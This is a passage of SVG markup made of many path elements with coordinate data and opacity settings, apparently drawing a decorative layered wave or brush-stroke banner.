d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n          opacity=\"0.1\"></path>\n        <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path 